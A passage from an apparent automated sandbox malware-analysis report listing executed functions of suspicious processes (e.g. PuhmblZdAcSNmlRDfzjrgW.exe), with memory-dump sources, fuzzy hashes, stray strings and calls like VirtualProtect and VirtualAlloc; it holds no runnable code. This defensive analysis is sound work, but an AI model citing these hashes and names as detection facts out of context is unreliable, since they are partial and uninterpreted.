Function 00007FFD34691D30 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD34696E70 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31d8b962ad8697e016be0419b8b3746812643610956d0d679795cb27cfcbcbb5
Instruction ID: 0b3335f499660e520532550416706150eb58efad8a857841b84cb8fba4dbfe91
Opcode Fuzzy Hash: 31d8b962ad8697e016be0419b8b3746812643610956d0d679795cb27cfcbcbb5
Instruction Fuzzy Hash: 4FD01234B609044F870CAA388C998747391EBAA21779540B9D00BC72B1D96ADC89D781

Function 00007FFD3469B768 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cfeb8210af1f5946056ac14781613267785eb459361b3b6d7a9169be9049ff
Instruction ID: eaa5434544c5933223bb137adda916ba237a47e76573cc269d7db32b9e6c2e14
Opcode Fuzzy Hash: 11cfeb8210af1f5946056ac14781613267785eb459361b3b6d7a9169be9049ff
Instruction Fuzzy Hash: D8D01234B609044F870CBA3889A98747391EB6A21679544B9D00AC72B2D96ADC89DB41

Function 00007FFD346748FD Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa90a29e305fe821bada111ddc5005f10706fd753ff8886125b72888df011d23
Instruction ID: dacfc13f64a415cbaf6de3790553ad0882d4f1c966114fa02bf62e0477359007
Opcode Fuzzy Hash: fa90a29e305fe821bada111ddc5005f10706fd753ff8886125b72888df011d23
Instruction Fuzzy Hash: 75D0C920B0895A8BE656FE1CD8E46FD22A5FF46310F010431E90EC3196DE2CE851AA01

Function 00007FFD346625D6 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 940f559e1b87430183d5969b4252414e2c50d2f71825721933309ee9f665aac2
Instruction ID: 72a2d8cf73d835105e371ff2017beeb4c14747f2f9dcbdf7551843618f48d16c
Opcode Fuzzy Hash: 940f559e1b87430183d5969b4252414e2c50d2f71825721933309ee9f665aac2
Instruction Fuzzy Hash: FED0C914F1896A47E644AB2480B61FA16819B46330F040875AA0EC73D2DE2C2C412A80

Function 00007FFD34661F58 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 905443de75d5f5cf95f89da95b19c81fe186f36051fa2054e7afba1a66c12da1
Instruction ID: 9cb17186ee884606b6a26962bb3609198451a5dc1ab9093bf2827a13c15b4438
Opcode Fuzzy Hash: 905443de75d5f5cf95f89da95b19c81fe186f36051fa2054e7afba1a66c12da1
Instruction Fuzzy Hash: 67D01220F0C5374BFBA4AA04C8A17F96256DF95324F1450B8DB4ED32C1DD3CAD806705

Function 00007FFD34662D4D Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction ID: af598657691767c2e8110a6b5b77218ee4270287afbaa972597fcde8123c2360
Opcode Fuzzy Hash: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction Fuzzy Hash:

Analysis Process: PuhmblZdAcSNmlRDfzjrgW.exePID: 3468, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD346A10EA Relevance: 1.8, Strings: 1, Instructions: 526
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`u4, xrefs: 00007FFD346A15C5

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd346a0000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID: `u4
API String ID: 0-3906581630
Opcode ID: 1671e7000b4bcd2530bdc391e0813537ad314b70ce1a00ff3028f6c166bd227a
Instruction ID: f131fe1e8afb5582063b4d3f87e206fe25aa69326ee35adad803553a327bf825
Opcode Fuzzy Hash: 1671e7000b4bcd2530bdc391e0813537ad314b70ce1a00ff3028f6c166bd227a
Instruction Fuzzy Hash: 24E19E71A1EAAA0BE36D9E2848E60F57791EF53315B1842BDCADBC74C7DC1C680792C1

Function 00007FFD34670D47 Relevance: 1.5, Strings: 1, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5Y_H, xrefs: 00007FFD34670DF3

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd34670000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID: 5Y_H
API String ID: 0-3237497481
Opcode ID: 5446f709c3fd4eb7d51ce8de95e0eacd5c448c4d6d7ec713efede32f1df65291
Instruction ID: 59d6530d396fbcba63abcd64096fbfe7259a606c5f6c87a172a62caf68b5ad20
Opcode Fuzzy Hash: 5446f709c3fd4eb7d51ce8de95e0eacd5c448c4d6d7ec713efede32f1df65291
Instruction Fuzzy Hash: 1891F271A18B9D8FE799DB68C8B93E87FE1FB56308F4441ABC049D72E2CA7918119710

Function 00007FFD34670E43 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd34670000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57a8e3ee29b7c6f71aedd2086b6b6155ddd5173e1fd7697705521655f684d741
Instruction ID: db48d1d88d7322a7439b6c8b62e81299ebdb1b88e53f9466e8dc2beb7185062f
Opcode Fuzzy Hash: 57a8e3ee29b7c6f71aedd2086b6b6155ddd5173e1fd7697705521655f684d741
Instruction Fuzzy Hash: 1051A372B18E9D8EE798DF58C8B97E97FE1FB96318F5002AAC449D37D1CAB914118700

Function 00007FFD346A1C89 Relevance: 2.6, Strings: 2, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD346A1CA6
Xu4, xrefs: 00007FFD346A1CF6

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd346a0000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID: M$Xu4
API String ID: 0-1568310727
Opcode ID: d12c6dffba02cf46c4c8a02f96aecb721015e8ba9b38479c9ee0b77502c6247f
Instruction ID: f9d7b9a4c050b0495db0fce623567a4556ee902ffa65c7a58310f053cd027c93
Opcode Fuzzy Hash: d12c6dffba02cf46c4c8a02f96aecb721015e8ba9b38479c9ee0b77502c6247f
Instruction Fuzzy Hash: 9A11A7B1A1E7C94FDB56AF3848A50D87FB0EF57200B4901FBD155CB1A3E92C9845C701

Function 00007FFD3467B16A Relevance: 1.6, APIs: 1, Instructions: 144
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFD3467B24D

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD34674000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34674000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd34674000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 32cd5fa9186dd16ff99eb766bb3b86295e0c168208bc541ab56098fdab50a028
Instruction ID: 4cde2b01fdabb6908beb0ba30d3a9bc3922996c308a11b727b8887b5067514c7
Opcode Fuzzy Hash: 32cd5fa9186dd16ff99eb766bb3b86295e0c168208bc541ab56098fdab50a028
Instruction Fuzzy Hash: 9741383190C7884FDB1A9BA89C566F97FE0EF57721F0442AFD089C3192CA786806C792

Function 00007FFD346A3415 Relevance: 1.5, Strings: 1, Instructions: 297
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@aU4, xrefs: 00007FFD346A3498

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd346a0000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID: @aU4
API String ID: 0-356350866
Opcode ID: ab301057e1655b6c1e86d456d2ee3c6aa91b89bec56fc6bd1060e64e3c2fc9a5
Instruction ID: 2f56836538604eb8c7d5083910469fe3cf10eb22636c9492e7f2c0df263f1c85
Opcode Fuzzy Hash: ab301057e1655b6c1e86d456d2ee3c6aa91b89bec56fc6bd1060e64e3c2fc9a5
Instruction Fuzzy Hash: FB91D561B1DE990FEBD8AE6884B62F572C1EF95304F04417AD94EC7287DD2CAC859740

Function 00007FFD3467C141 Relevance: 1.4, APIs: 1, Instructions: 127
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00007FFD3467C1F4

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD34674000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34674000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd34674000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 20fee912e539043be671827c8a023b33cdad9daaf9baec5dd0e2264c37232515
Instruction ID: 346c6af82760ac15705cc4248e6daf1f96c9075b40249fc2a9ef8ad53f380188
Opcode Fuzzy Hash: 20fee912e539043be671827c8a023b33cdad9daaf9baec5dd0e2264c37232515
Instruction Fuzzy Hash: 5F313931A0CB8C4FDB1DEFA898566F97BE0EF96321F00827FD089D3152CA646815C782

Function 00007FFD346A7D69 Relevance: 1.3, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD346A7D86

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd346a0000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: e3117d75e8823badb9d2f23ed6912fe6007f6fc95aa50507147797cf57774446
Instruction ID: 190a438452a81988c4c04313a07ea80165f6cbcf48fff08b4014b313a72ac0fe
Opcode Fuzzy Hash: e3117d75e8823badb9d2f23ed6912fe6007f6fc95aa50507147797cf57774446
Instruction Fuzzy Hash: 3F21F661A0E6D50FD36AAA3488A59B57FA0EF57311F0900FFD58AC71D3E91CAC06C352

Function 00007FFD34684529 Relevance: 1.3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD34684546

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd34680000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 6998e5317543143c28f27d5b76af7d39ab8d2e3baf11ed35760650dc88b7475b
Instruction ID: c06d73962276fb852458f7453aa9383cd02c38a4b263d740f67a7503594a2dce
Opcode Fuzzy Hash: 6998e5317543143c28f27d5b76af7d39ab8d2e3baf11ed35760650dc88b7475b
Instruction Fuzzy Hash: 4611E621A0D6D54FD756EB3088A46A83FA1AF57310F4901FBC189CF1E3EA1D9C49C312

Function 00007FFD346AA4F9 Relevance: 1.3, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD346AA516

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd346a0000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: c614c03890212b7c37176e0256471e35da13ad261c82494d21896409bade9bf6
Instruction ID: b6f453bd8633fa530cfd93922ca1f6a614c978d4b14329a62a4e7b25c641591c
Opcode Fuzzy Hash: c614c03890212b7c37176e0256471e35da13ad261c82494d21896409bade9bf6
Instruction Fuzzy Hash: 0211E571A0E7C84FDB46EB744CA94A57FB0EF57200B4A41EBD049CB1A3EA2DAC49C701

Function 00007FFD346AA429 Relevance: 1.3, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD346AA446

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd346a0000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 0e18174cd63c9a7b2485cdd0990b0b81c52a8a0f409c02e3146640b03b54c0d3
Instruction ID: ceba91ef501c412cf44623f2d3476341fbbdaf41c2cfebf5d5b4098bb5958052
Opcode Fuzzy Hash: 0e18174cd63c9a7b2485cdd0990b0b81c52a8a0f409c02e3146640b03b54c0d3
Instruction Fuzzy Hash: 2101B561A0FBD10FD7AA5A7448790A47FA0DF57210B0A01EFD189CF5E3E91D9C88C752

Function 00007FFD34683AC9 Relevance: 1.3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD34683AE6

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd34680000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 9cea9abe456a8142730e3ff630e2012d34cccdaa1c121d055ddf5ff3e020f332
Instruction ID: da70bbe527709f5306cc1fd61f026eac8612b699cbc97e049ec1889d1dda5ac1
Opcode Fuzzy Hash: 9cea9abe456a8142730e3ff630e2012d34cccdaa1c121d055ddf5ff3e020f332
Instruction Fuzzy Hash: CCE09B7164E7C04FC716DB3448684557FA1EF6721174A41EEC046CF1A3DA1DCC85C701

Function 00007FFD346A09A9 Relevance: 1.3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD346A09C6

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd346a0000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 4d47b234be820dba40ae1190104cfbce3033262060f6f2c3f1f55fa921e3a48c
Instruction ID: 5c49cf0ac31fccd7b2ca615fc6d4c320c88a15e3ac400a7f32a2d49289c5d74d
Opcode Fuzzy Hash: 4d47b234be820dba40ae1190104cfbce3033262060f6f2c3f1f55fa921e3a48c
Instruction Fuzzy Hash: E5E06571A0F7C04FCB16DA344868454BFB0EF6721174A52EEC145CF1A3DA1D8845C701

Function 00007FFD346A1D19 Relevance: 1.3, Strings: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD346A1D36

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd346a0000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 0c40dd9066a9d17f7a118f70717fb3dfda45c611d69d562bbdf141d0b12a4035
Instruction ID: 02321abc00fb75fc70e93070331d2f54347669b76d544ca344e3e597f1fd8f77
Opcode Fuzzy Hash: 0c40dd9066a9d17f7a118f70717fb3dfda45c611d69d562bbdf141d0b12a4035
Instruction Fuzzy Hash: CAE09A7144F7C04FCB46AB3488768843FA0AE6720078A00EEC086CF2B3E22D9848CB01

Function 00007FFD346AAA39 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD346AAA56

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd346a0000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 4247bdf19deb21b323c394fc6ece247b275bec124cafa525be4f58e2677795c5
Instruction ID: 0ecb5ac5801d6c937ab5779c261785e549c6e504e3f99269bb4ec2fa6be91596
Opcode Fuzzy Hash: 4247bdf19deb21b323c394fc6ece247b275bec124cafa525be4f58e2677795c5
Instruction Fuzzy Hash: 55E01AB154F7D04FCB46EB3488A98497FA0EE6721078B41EEC145CF5B3E62E8849C701

Function 00007FFD346A2351 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd346a0000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8281a21db32b37b318e60a52de4b527c6b3e821ca3cc56ab30a7dc3f138674d1
Instruction ID: e1ac384380559393a7cef1c7b55731f86bffb550e4f538f764e1cb35cf83d14f
Opcode Fuzzy Hash: 8281a21db32b37b318e60a52de4b527c6b3e821ca3cc56ab30a7dc3f138674d1
Instruction Fuzzy Hash: AE31F5B1A09EA94FE799DE08C8A4BF977E1EB95310F04017AD40AD72C2CA6C6C959781

Function 00007FFD346AAD2A Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd346a0000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a236664b128b09601065196f76f559fa0be5275316009918fe8365eb8fb88d54
Instruction ID: f4ff2811350753fd8f11a89afdea6da8c61755cb60aeabcc793ac484dfc0bb58
Opcode Fuzzy Hash: a236664b128b09601065196f76f559fa0be5275316009918fe8365eb8fb88d54
Instruction Fuzzy Hash: E03107A1B0ADAA4FE7D5AE1888E52F873A1FF96305F54007BC54EC7196DE6C6841A340

Function 00007FFD3467116D Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd34670000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aac454de76bd67b3478d34b9f7f423841a5819a286b5df838483fd47ca938c3
Instruction ID: 60ead8c451e6c40a1b6398ef4a4e7fcc2de67ee336d24c2f1b68d7f01e7b470e
Opcode Fuzzy Hash: 0aac454de76bd67b3478d34b9f7f423841a5819a286b5df838483fd47ca938c3
Instruction Fuzzy Hash: AB41D331A0D6998FDB45EF68C8A59F97FF0EF16314B0841BBC44ADB293DA2CA441CB40

Function 00007FFD34670C25 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd34670000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3dedc723765477f545be851429b656f43d7229237fda6817a7576b05942a22
Instruction ID: 98d3a909d8a51ad6040b818c46234267c59a981abacdecc38bf2b29a56cec6da
Opcode Fuzzy Hash: 1c3dedc723765477f545be851429b656f43d7229237fda6817a7576b05942a22
Instruction Fuzzy Hash: 06210471B0DA998FE712DF68C8A92EC7FA0EF42314F1581BAC144CB1C2DA3C65499B61

Function 00007FFD346AB6FA Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd346a0000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ccb35182cd3ce906f15adb027d16db2b9b6c6bf6fba976da382b8fcb16225e
Instruction ID: 86099dc8d6677227c22aa84ca771571921612c55edb05b3abd734fba0f6d571d
Opcode Fuzzy Hash: f4ccb35182cd3ce906f15adb027d16db2b9b6c6bf6fba976da382b8fcb16225e
Instruction Fuzzy Hash: 5E110A23619A514BE359FF5CE4F64E537D0EF5262870900BBD188CE0A3ED1AE40A8245

Function 00007FFD346AD8C9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd346a0000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5d5f827bb851372432c8569d816be997062e0e65e9d4249afbf7b6e6256eddd
Instruction ID: 52880a7b0ffeb83131302b1039d7057f9ee95bf5969ccb9f9c7eee0c6babff4d
Opcode Fuzzy Hash: a5d5f827bb851372432c8569d816be997062e0e65e9d4249afbf7b6e6256eddd
Instruction Fuzzy Hash: 9F01F772A4AA8C4FDB45EF7488E98E87FB5EF46210F4541FBD049CB1A3D9299948C701

Function 00007FFD34683E4B Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd34680000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ffbd7a068952bfe1cc5ea11a35805eb677d0df77e7bb587bfb94cb2366aed02
Instruction ID: d7ccfcfdd880fa94c4cc5c51d4f3bc75616e54b870230e8d695c15779833aa84
Opcode Fuzzy Hash: 3ffbd7a068952bfe1cc5ea11a35805eb677d0df77e7bb587bfb94cb2366aed02
Instruction Fuzzy Hash: CA013C71F0851A8FEB64EF94C8A46FD77B1FF59314F14053AD019E3292DE7869419B80

Function 00007FFD346A8FC1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd346a0000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce68fa43102d7fd851a20653354a894fe231b7f3824065b7f2b86bb70b0b0bb
Instruction ID: 59d5a8181cf354f8eee70dcccd40a0882f4799347526b0447da69de4d9cf8ae2
Opcode Fuzzy Hash: 5ce68fa43102d7fd851a20653354a894fe231b7f3824065b7f2b86bb70b0b0bb
Instruction Fuzzy Hash: 15F0C29290FAD75EE7A29B7848660E87FA0EF13250B4912FAD288CA093D81D18469342

Function 00007FFD346AD764 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd346a0000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2ce713b6d7f70e1599fea40de70d211339737a6d561d09aa2be183e2d9d5108
Instruction ID: 7c34273b63cda5ace6f4f22f626481447687b3eb3986d1fb3662a5faacdf8a92
Opcode Fuzzy Hash: b2ce713b6d7f70e1599fea40de70d211339737a6d561d09aa2be183e2d9d5108
Instruction Fuzzy Hash: 3E01A771F0592A4FEBD8EA64D4A57FD73E1EF95301F040436D60DC3286DA2CE9409780

Function 00007FFD34670C48 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd34670000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6645bfc6e240ca50848062631be957ae8dec1bebba1da8333d77b11b9b3f05e4
Instruction ID: bc6d065e70b7c565a281dbfe73476844ccaabea6c34557c4de1755de7c119219
Opcode Fuzzy Hash: 6645bfc6e240ca50848062631be957ae8dec1bebba1da8333d77b11b9b3f05e4
Instruction Fuzzy Hash: 93017175A0D7C88FE712DF68C8941DDBFB0AF43314F1585EAC580DB192E6389648D791

Function 00007FFD346A78B2 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2498220720.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffd346a0000_PuhmblZdAcSNmlRDfzjrgW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a5239a7f1e841f0b3b2b5a358864bacd64f9dc8280ccb95096bed30ad104e82
